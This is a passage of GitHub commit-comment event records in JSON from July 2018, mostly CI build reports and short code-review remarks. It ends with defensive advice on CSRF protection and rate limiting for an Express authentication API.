{"id":"7920737377","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29600994,"position":null,"line":null,"path":null,"commit_id":"fb6546440b270cc144874a629e6930f014d02aee","created_at":"2018-07-05T03:05:02Z","updated_at":"2018-07-05T03:05:02Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-MacOS-10.9-clang: Build Failed\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 625\n\nregression Test Summary\n * Passed: 622\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fb6546440b270cc144874a629e6930f014d02aee-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fb6546440b270cc144874a629e6930f014d02aee-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.27%25-red.png)</a> \n"}},"created_at":"2018-07-05T03:05:02Z"}
{"id":"7920738491","type":"CommitCommentEvent","actor":{"login":"ha271923"},"repo":{"name":"ha271923/MyBasicAppComponents"},"payload":{"comment":{"id":29600997,"position":null,"line":null,"path":null,"commit_id":"45f9e1e6ff63ca36cf26d52b819e64abaa993487","created_at":"2018-07-05T03:05:30Z","updated_at":"2018-07-05T03:05:30Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/12508109/42300480-5210115c-8043-11e8-9315-6d0f20a2f5dd.png)\r\n"}},"created_at":"2018-07-05T03:05:30Z"}
{"id":"7920739684","type":"CommitCommentEvent","actor":{"login":"MichaelB7"},"repo":{"name":"Zerbinati/SugaR"},"payload":{"comment":{"id":29600999,"position":null,"line":null,"path":null,"commit_id":"6651c4d35a53bf1aed6a242dc69df596bb65b86e","created_at":"2018-07-05T03:06:06Z","updated_at":"2018-07-05T03:06:06Z","author_association":"NONE","body":"Thank you Marco - please continue your nice work. 👍"}},"created_at":"2018-07-05T03:06:06Z"}
{"id":"7920743514","type":"CommitCommentEvent","actor":{"login":"Manuel-777"},"repo":{"name":"Manuel-777/MTG-Arena-Tool"},"payload":{"comment":{"id":29601004,"position":null,"line":null,"path":null,"commit_id":"58153faded4ddef35582201f818643aa288ea951","created_at":"2018-07-05T03:07:48Z","updated_at":"2018-07-05T03:07:48Z","author_association":"OWNER","body":"Added mana filters to collection, as well as options to filter by selected only and exclude unselected;\r\n\r\n![manafilters](https://user-images.githubusercontent.com/4711391/42300535-55b8203a-7fe7-11e8-8f0e-2b788fc11181.png)\r\n\r\nImprooves #3 "}},"created_at":"2018-07-05T03:07:48Z"}
{"id":"7920747296","type":"CommitCommentEvent","actor":{"login":"DamasMahardi"},"repo":{"name":"DamasMahardi/utsdamas"},"payload":{"comment":{"id":29601010,"position":9,"line":9,"path":"README.md","commit_id":"476842d3c1bf0ef1ee9725c8b83d941b2fc41033","created_at":"2018-07-05T03:09:36Z","updated_at":"2018-07-05T03:09:36Z","author_association":"OWNER","body":"![screenshot-2018-7-4 profile](https://user-images.githubusercontent.com/35065946/42300601-71a6d0bc-803b-11e8-889d-844c94f02879.png)\r\n"}},"created_at":"2018-07-05T03:09:36Z"}
{"id":"7920748839","type":"CommitCommentEvent","actor":{"login":"DamasMahardi"},"repo":{"name":"DamasMahardi/utsdamas"},"payload":{"comment":{"id":29601013,"position":13,"line":13,"path":"README.md","commit_id":"476842d3c1bf0ef1ee9725c8b83d941b2fc41033","created_at":"2018-07-05T03:10:17Z","updated_at":"2018-07-05T03:10:17Z","author_association":"OWNER","body":"![screenshot-2018-7-4 contact](https://user-images.githubusercontent.com/35065946/42300625-94d88cd8-803b-11e8-9683-61237813b577.png)\r\n"}},"created_at":"2018-07-05T03:10:17Z"}
{"id":"7920749941","type":"CommitCommentEvent","actor":{"login":"Kerooker"},"repo":{"name":"mockk/mockk"},"payload":{"comment":{"id":29601016,"position":null,"line":null,"path":null,"commit_id":"1087750b0efac3015e7876710a1f97b1cf43c7cd","created_at":"2018-07-05T03:10:47Z","updated_at":"2018-07-05T03:10:47Z","author_association":"COLLABORATOR","body":"Missing some tests to make sure behavior works"}},"created_at":"2018-07-05T03:10:47Z"}
{"id":"7920750283","type":"CommitCommentEvent","actor":{"login":"DamasMahardi"},"repo":{"name":"DamasMahardi/utsdamas"},"payload":{"comment":{"id":29601017,"position":8,"line":8,"path":"README.md","commit_id":"476842d3c1bf0ef1ee9725c8b83d941b2fc41033","created_at":"2018-07-05T03:10:56Z","updated_at":"2018-07-05T03:10:56Z","author_association":"OWNER","body":"![screenshot-2018-7-4 profile](https://user-images.githubusercontent.com/35065946/42300647-aa8a68b2-803b-11e8-838b-2b812e140eb6.png)\r\n"}},"created_at":"2018-07-05T03:10:56Z"}
{"id":"7920754930","type":"CommitCommentEvent","actor":{"login":"Sle2ping"},"repo":{"name":"Sle2ping/hello-world"},"payload":{"comment":{"id":29601028,"position":null,"line":null,"path":null,"commit_id":"bab1e62f2d14fb0743b9c04802cb2007dbb9f07d","created_at":"2018-07-05T03:13:00Z","updated_at":"2018-07-05T03:13:00Z","author_association":"OWNER","body":"add some introduction."}},"created_at":"2018-07-05T03:13:00Z"}
{"id":"7920755632","type":"CommitCommentEvent","actor":{"login":"RudreshAmity"},"repo":{"name":"RudreshAmity/MoBuildWebsite"},"payload":{"comment":{"id":29601029,"position":null,"line":null,"path":null,"commit_id":"a0184ef780a71b80b7094aceab5c4982e93cf2fa","created_at":"2018-07-05T03:13:19Z","updated_at":"2018-07-05T03:13:19Z","author_association":"OWNER","body":"UI fixes"}},"created_at":"2018-07-05T03:13:19Z"}
{"id":"7920761888","type":"CommitCommentEvent","actor":{"login":"kongyi-ibm"},"repo":{"name":"IBM/wc-devops-utilities"},"payload":{"comment":{"id":29601043,"position":null,"line":null,"path":null,"commit_id":"de0b7043b6bff77d5df33aa624f44b0cb5ac09b7","created_at":"2018-07-05T03:16:10Z","updated_at":"2018-07-05T03:16:10Z","author_association":"CONTRIBUTOR","body":"@TiffanyLiIBM \r\n\r\nThere have one technical point need to be correct on your new version.  \r\n\r\nIn deploy salve, it includes dockerd, but you changed it to Docker."}},"created_at":"2018-07-05T03:16:10Z"}
{"id":"7920769918","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/backpack-feedstock"},"payload":{"comment":{"id":29601057,"position":null,"line":null,"path":null,"commit_id":"76f8451958b6dec5a85b80b44e21bd1821c58181","created_at":"2018-07-05T03:19:34Z","updated_at":"2018-07-05T03:19:34Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nick-youngblut were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-05T03:19:34Z"}
{"id":"7920771215","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/kivy-feedstock"},"payload":{"comment":{"id":29601059,"position":null,"line":null,"path":null,"commit_id":"2fafe5561bd553773ec97a2a2188d30d58821f44","created_at":"2018-07-05T03:20:08Z","updated_at":"2018-07-05T03:20:08Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @akshayaurora, @tito were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @akshayaurora, @matham, @tito were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-05T03:20:08Z"}
{"id":"7920793216","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29601092,"position":null,"line":null,"path":null,"commit_id":"fb6546440b270cc144874a629e6930f014d02aee","created_at":"2018-07-05T03:30:03Z","updated_at":"2018-07-05T03:30:03Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fb6546440b270cc144874a629e6930f014d02aee-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-05T03:30:03Z"}
{"id":"7920794241","type":"CommitCommentEvent","actor":{"login":"RUPESH1439"},"repo":{"name":"dineshdb/dbms-frontend"},"payload":{"comment":{"id":29601100,"position":null,"line":null,"path":null,"commit_id":"d4ee9519ffdf15142b7c4cc5637d794c055148a9","created_at":"2018-07-05T03:30:28Z","updated_at":"2018-07-05T03:30:28Z","author_association":"COLLABORATOR","body":"what sort of problems?\r\n@dineshdb "}},"created_at":"2018-07-05T03:30:28Z"}
{"id":"7920797243","type":"CommitCommentEvent","actor":{"login":"wangshankun"},"repo":{"name":"wangshankun/rcnn-optimize"},"payload":{"comment":{"id":29601104,"position":null,"line":null,"path":null,"commit_id":"25ebd91fda917c95795ec79c98a7543f56084648","created_at":"2018-07-05T03:31:43Z","updated_at":"2018-07-05T03:31:43Z","author_association":"OWNER","body":"mutex锁失效，这里应该cpu在做切换的前后，缓存有更新，两个CPU之间数据不一致，导致的。\r\n这个问题锁也没有效果可以避免，因此必须引入**内存屏障**来解决，因为应用层的内存屏障没有\r\n统一接口，自己实现也不方便移植，因此没有选用内存屏障解决；而是采取了spin lock来做这件事\r\n巧合这个cpu多锁少的场景下spin lock很适合，并且效率远高于mutex，因此就采用此方法"}},"created_at":"2018-07-05T03:31:43Z"}
{"id":"7920801504","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29601112,"position":null,"line":null,"path":null,"commit_id":"fb6546440b270cc144874a629e6930f014d02aee","created_at":"2018-07-05T03:33:46Z","updated_at":"2018-07-05T03:33:46Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fb6546440b270cc144874a629e6930f014d02aee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fb6546440b270cc144874a629e6930f014d02aee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-45.36%25-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fb6546440b270cc144874a629e6930f014d02aee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.png)</a>\n"}},"created_at":"2018-07-05T03:33:46Z"}
{"id":"7920802683","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29601114,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-05T03:34:16Z","updated_at":"2018-07-05T03:34:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T03:34:16Z"}
{"id":"7920805671","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29601120,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-05T03:35:40Z","updated_at":"2018-07-05T03:35:40Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T03:35:40Z"}
{"id":"7920808356","type":"CommitCommentEvent","actor":{"login":"amshq"},"repo":{"name":"amshq/scripts-sh-"},"payload":{"comment":{"id":29601122,"position":null,"line":null,"path":null,"commit_id":"9b0077a43aac6a266ca875a43143f2cff6fe284c","created_at":"2018-07-05T03:36:55Z","updated_at":"2018-07-05T03:36:55Z","author_association":"OWNER","body":"one"}},"created_at":"2018-07-05T03:36:55Z"}
{"id":"7920808487","type":"CommitCommentEvent","actor":{"login":"cheshire"},"repo":{"name":"apple/swift-compiler-rt"},"payload":{"comment":{"id":29601123,"position":null,"line":null,"path":null,"commit_id":"4ca89b7a97fc9d9bd8ca00e7d7bfd114d85fc29c","created_at":"2018-07-05T03:36:59Z","updated_at":"2018-07-05T03:36:59Z","author_association":"MEMBER","body":"@futurejones this is fixed in the `upstream-with-swift` branch.\r\nDo you really need it fixed in swift-4.2-branch?"}},"created_at":"2018-07-05T03:36:59Z"}
{"id":"7920809675","type":"CommitCommentEvent","actor":{"login":"takukatafuchi"},"repo":{"name":"keita-ito0221/test"},"payload":{"comment":{"id":29601126,"position":62,"line":62,"path":"EV3/EV3_copy/RunGarage.cpp","commit_id":"00ca32aa3cf374859fb2c57c1c2e3c7974319771","created_at":"2018-07-05T03:37:33Z","updated_at":"2018-07-05T03:37:33Z","author_association":"COLLABORATOR","body":"＠takayamazusa\r\nコメントのテストもかねて\r\nこの56～62行がよくわかりません。\r\nこのfor文はいるのかな？\r\nいらなければ56～62行を消せば、}の問題も解決しますね。"}},"created_at":"2018-07-05T03:37:33Z"}
{"id":"7920814944","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29601136,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-05T03:39:55Z","updated_at":"2018-07-05T03:39:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T03:39:55Z"}
{"id":"7920815344","type":"CommitCommentEvent","actor":{"login":"davidjin0813"},"repo":{"name":"springware1/ccm"},"payload":{"comment":{"id":29601141,"position":6,"line":1163,"path":"tests/1/dir/index.h","commit_id":"1884f220814b91541a0a2356b3733894cd71437c","created_at":"2018-07-05T03:40:07Z","updated_at":"2018-07-05T03:40:07Z","author_association":"COLLABORATOR","body":"tell alex to let Mr.Jang call aunt for new business."}},"created_at":"2018-07-05T03:40:07Z"}
{"id":"7920817811","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29601145,"position":null,"line":null,"path":null,"commit_id":"fb6546440b270cc144874a629e6930f014d02aee","created_at":"2018-07-05T03:41:15Z","updated_at":"2018-07-05T03:41:15Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Build Failed\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 628\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fb6546440b270cc144874a629e6930f014d02aee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fb6546440b270cc144874a629e6930f014d02aee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-33.06%25-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fb6546440b270cc144874a629e6930f014d02aee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.png)</a>\n"}},"created_at":"2018-07-05T03:41:15Z"}
{"id":"7920820244","type":"CommitCommentEvent","actor":{"login":"javabrett"},"repo":{"name":"requests/httpbin"},"payload":{"comment":{"id":29601147,"position":null,"line":null,"path":null,"commit_id":"660801081cc485754720a11cc83a03c4c1df10e0","created_at":"2018-07-05T03:42:23Z","updated_at":"2018-07-05T03:42:23Z","author_association":"CONTRIBUTOR","body":"I've added PR #482 which should be a nice compromise - query string params are still allowed, but for `POST`, `PATCH` or `PUT` with a form-data body containing `url` and/or `status_code`, these override any query-string data, or simply work if there is no query-string."}},"created_at":"2018-07-05T03:42:23Z"}
{"id":"7920822051","type":"CommitCommentEvent","actor":{"login":"myy2829"},"repo":{"name":"bsc-s2/pykit"},"payload":{"comment":{"id":29601151,"position":15,"line":41,"path":"cluster/block_group.py","commit_id":"d3addba8e54ffab4a7bc5b980c7ff1a338c1c9a6","created_at":"2018-07-05T03:43:14Z","updated_at":"2018-07-05T03:43:14Z","author_association":"CONTRIBUTOR","body":"_idcs和list有什么区别吗"}},"created_at":"2018-07-05T03:43:14Z"}
{"id":"7920822754","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29601153,"position":null,"line":null,"path":null,"commit_id":"fb6546440b270cc144874a629e6930f014d02aee","created_at":"2018-07-05T03:43:32Z","updated_at":"2018-07-05T03:43:32Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fb6546440b270cc144874a629e6930f014d02aee-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-05T03:43:32Z"}
{"id":"7920828920","type":"CommitCommentEvent","actor":{"login":"davidjin0813"},"repo":{"name":"springware1/ccm"},"payload":{"comment":{"id":29601160,"position":6,"line":1163,"path":"tests/1/dir/index.h","commit_id":"1884f220814b91541a0a2356b3733894cd71437c","created_at":"2018-07-05T03:46:14Z","updated_at":"2018-07-05T03:46:14Z","author_association":"COLLABORATOR","body":"let him call today"}},"created_at":"2018-07-05T03:46:14Z"}
{"id":"7920833497","type":"CommitCommentEvent","actor":{"login":"pjaudiomv"},"repo":{"name":"radius314/yap"},"payload":{"comment":{"id":29601168,"position":null,"line":null,"path":null,"commit_id":"e7c02cdcdb1ce918372bc2e096493c891b40c5f0","created_at":"2018-07-05T03:48:18Z","updated_at":"2018-07-05T03:48:18Z","author_association":"CONTRIBUTOR","body":"I could not get this to work, tested a few different ways. with same setup that I had working with yap 1.3"}},"created_at":"2018-07-05T03:48:18Z"}
{"id":"7920833750","type":"CommitCommentEvent","actor":{"login":"krt2311"},"repo":{"name":"krt2311/gformWorkflow"},"payload":{"comment":{"id":29601171,"position":null,"line":null,"path":null,"commit_id":"8885f0e2bd9fec793e0b31bbad8efe9332dbb362","created_at":"2018-07-05T03:48:24Z","updated_at":"2018-07-05T03:48:24Z","author_association":"OWNER","body":"This script is dependant on the central function library being pulled into it's project, and requires that any associated google form be harvesting an email address from the form users."}},"created_at":"2018-07-05T03:48:24Z"}
{"id":"7920837734","type":"CommitCommentEvent","actor":{"login":"pantheon-upstream"},"repo":{"name":"pantheon-systems/drops-8"},"payload":{"comment":{"id":29601176,"position":null,"line":null,"path":null,"commit_id":"a86edf3abab583805cdbc5611ff317cd4da07090","created_at":"2018-07-05T03:50:11Z","updated_at":"2018-07-05T03:50:11Z","author_association":"NONE","body":"Created multidev environment [ci-drops-8#c8-145](https://dashboard.pantheon.io/sites/689219ca-6583-4af8-ab05-2cebf6ef79a0#c8-145).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://c8-145-ci-drops-8.pantheonsite.io/)"}},"created_at":"2018-07-05T03:50:11Z"}
{"id":"7920839306","type":"CommitCommentEvent","actor":{"login":"Picasoll"},"repo":{"name":"Picasoll/Picasol"},"payload":{"comment":{"id":29601178,"position":null,"line":null,"path":null,"commit_id":"52647b2cf02eab550a858d069ac3880b1ca22a9f","created_at":"2018-07-05T03:50:57Z","updated_at":"2018-07-05T03:50:57Z","author_association":"OWNER","body":"\"what you want to be\""}},"created_at":"2018-07-05T03:50:57Z"}
{"id":"7920844687","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29601184,"position":null,"line":null,"path":null,"commit_id":"152da50ef9bef626b8831a8252d05b367754ff9e","created_at":"2018-07-05T03:53:27Z","updated_at":"2018-07-05T03:53:27Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/67/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/67//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/152da50ef9bef626b8831a8252d05b367754ff9e/67/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/152da50ef9bef626b8831a8252d05b367754ff9e/67/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/152da50ef9bef626b8831a8252d05b367754ff9e/67/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/152da50ef9bef626b8831a8252d05b367754ff9e/67/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-05T03:53:27Z"}
{"id":"7920846088","type":"CommitCommentEvent","actor":{"login":"dineshdb"},"repo":{"name":"dineshdb/dbms-frontend"},"payload":{"comment":{"id":29601189,"position":null,"line":null,"path":null,"commit_id":"d4ee9519ffdf15142b7c4cc5637d794c055148a9","created_at":"2018-07-05T03:54:05Z","updated_at":"2018-07-05T03:54:05Z","author_association":"OWNER","body":"Blocking of request to the API backend. Not in yours? Please try with the latest version of Firefox or Chrome."}},"created_at":"2018-07-05T03:54:05Z"}
{"id":"7920846401","type":"CommitCommentEvent","actor":{"login":"RudreshAmity"},"repo":{"name":"MoBuildIndia/BotEverywhere"},"payload":{"comment":{"id":29601193,"position":null,"line":null,"path":null,"commit_id":"a470ee6ddd73de4081f28405d4340d302c59df96","created_at":"2018-07-05T03:54:14Z","updated_at":"2018-07-05T03:54:14Z","author_association":"COLLABORATOR","body":"BotEverywhere website"}},"created_at":"2018-07-05T03:54:14Z"}
{"id":"7920847143","type":"CommitCommentEvent","actor":{"login":"dpgeorge"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":29601195,"position":null,"line":null,"path":null,"commit_id":"14ab81e87accedfb9ed231b206dd21f3a0143404","created_at":"2018-07-05T03:54:33Z","updated_at":"2018-07-05T03:54:33Z","author_association":"CONTRIBUTOR","body":"> As far as I can tell, this commit does not change however the latency of reponses to external interrupts.\r\n\r\nThat's correct.  For an external (or even internal, like timer) interrupt the sequence is:\r\n1. interrupt occurs, informs the chip (hardware level)\r\n2. IDF code responds to IRQ (IDF software level, this can introduce large delays due to caching, disabled interrupts, etc)\r\n3. IDF calls uPy ISR handler (software level, interface between IDF and uPy)\r\n4. uPy schedules Python callback (software level, internal uPy scheduling)\r\n5. uPy executes the scheduled Python callback at soonest possible time (usually in between bytecodes)\r\n\r\nWhat is optimised by this commit is (4)->(5), so that (5) is executed ASAP.\r\n\r\n> In a test with the actual repository i see response times of up to 2.7 ms\r\n\r\nThat's much better than it was in the past, which was up to 10ms due to the FreeRTOS tick interval.  It would be good to full understand the 2.7ms because maybe there is still room for improvement there (eg putting some stuff in iRAM)."}},"created_at":"2018-07-05T03:54:33Z"}
{"id":"7920848139","type":"CommitCommentEvent","actor":{"login":"LetmeAlittle"},"repo":{"name":"LetmeAlittle/QX"},"payload":{"comment":{"id":29601198,"position":null,"line":null,"path":null,"commit_id":"e46886aa7c24317174d1e6fc20a34cb87d72e40c","created_at":"2018-07-05T03:55:02Z","updated_at":"2018-07-05T03:55:02Z","author_association":"OWNER","body":"可以"}},"created_at":"2018-07-05T03:55:02Z"}
{"id":"7920850362","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29601204,"position":null,"line":null,"path":null,"commit_id":"ee07b8cb23e5330d25d0b05accdc0278997a0b3f","created_at":"2018-07-05T03:56:08Z","updated_at":"2018-07-05T03:56:08Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-05T03:56:08Z"}
{"id":"7920851361","type":"CommitCommentEvent","actor":{"login":"yonjah"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29601206,"position":5,"line":5,"path":"server/utils/utils.js","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-05T03:56:36Z","updated_at":"2018-07-05T03:56:36Z","author_association":"NONE","body":"Yes 16 bytes isn't a problem. I was thinking more if you might want the session to have higher entropy or maybe even allow it to be configurable (with a secure minimum value)"}},"created_at":"2018-07-05T03:56:36Z"}
{"id":"7920851669","type":"CommitCommentEvent","actor":{"login":"yonjah"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29601208,"position":9,"line":11,"path":"server/routes/users.js","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-05T03:56:46Z","updated_at":"2018-07-05T03:56:46Z","author_association":"NONE","body":"The thing is there are still some attacks possible on the login/logout if they don't have CSRF protection.\r\nThere are two ways to approach this -\r\n1. Have a session always available even if the user haven't yet logged in. You'll need to differentiate from authed and unauthed sessions but it shouldn't be very hard. You'll probably need a route for getting the session with the token.\r\n2. Have the login be a two step process. first step user sends his credentials and ask to loggin.\r\nIf login is valid you send back the token and only activate the session once the token is sent back to you from the client\r\n\r\nI prefer the first method since it's more in line with your other logic. From security perspective they are almost identical \r\n\r\n"}},"created_at":"2018-07-05T03:56:46Z"}
{"id":"7920851787","type":"CommitCommentEvent","actor":{"login":"yonjah"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29601209,"position":9,"line":9,"path":"server/middleware/csrfCheck.js","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-05T03:56:49Z","updated_at":"2018-07-05T03:56:49Z","author_association":"NONE","body":"I find that managing rate limiting outside the app can be a bit unreliable.\r\nEspecially if you want to use it to protect against brute force and failed attempts.\r\nI used to use fail2ban for all this stuff but than if you change the format of your logs you need to make sure fail2ban still works.\r\nNode has many rate limiting libraries some with built in support for express (I manage one called [ralphi](https://www.npmjs.com/package/ralphi) which does not rely on external database but since you any way use mongo you might have more suitable options).\r\n\r\nWith returning the CSRF on request that is not an issue. Read a bit more about this attack on OWASP but the way it works the 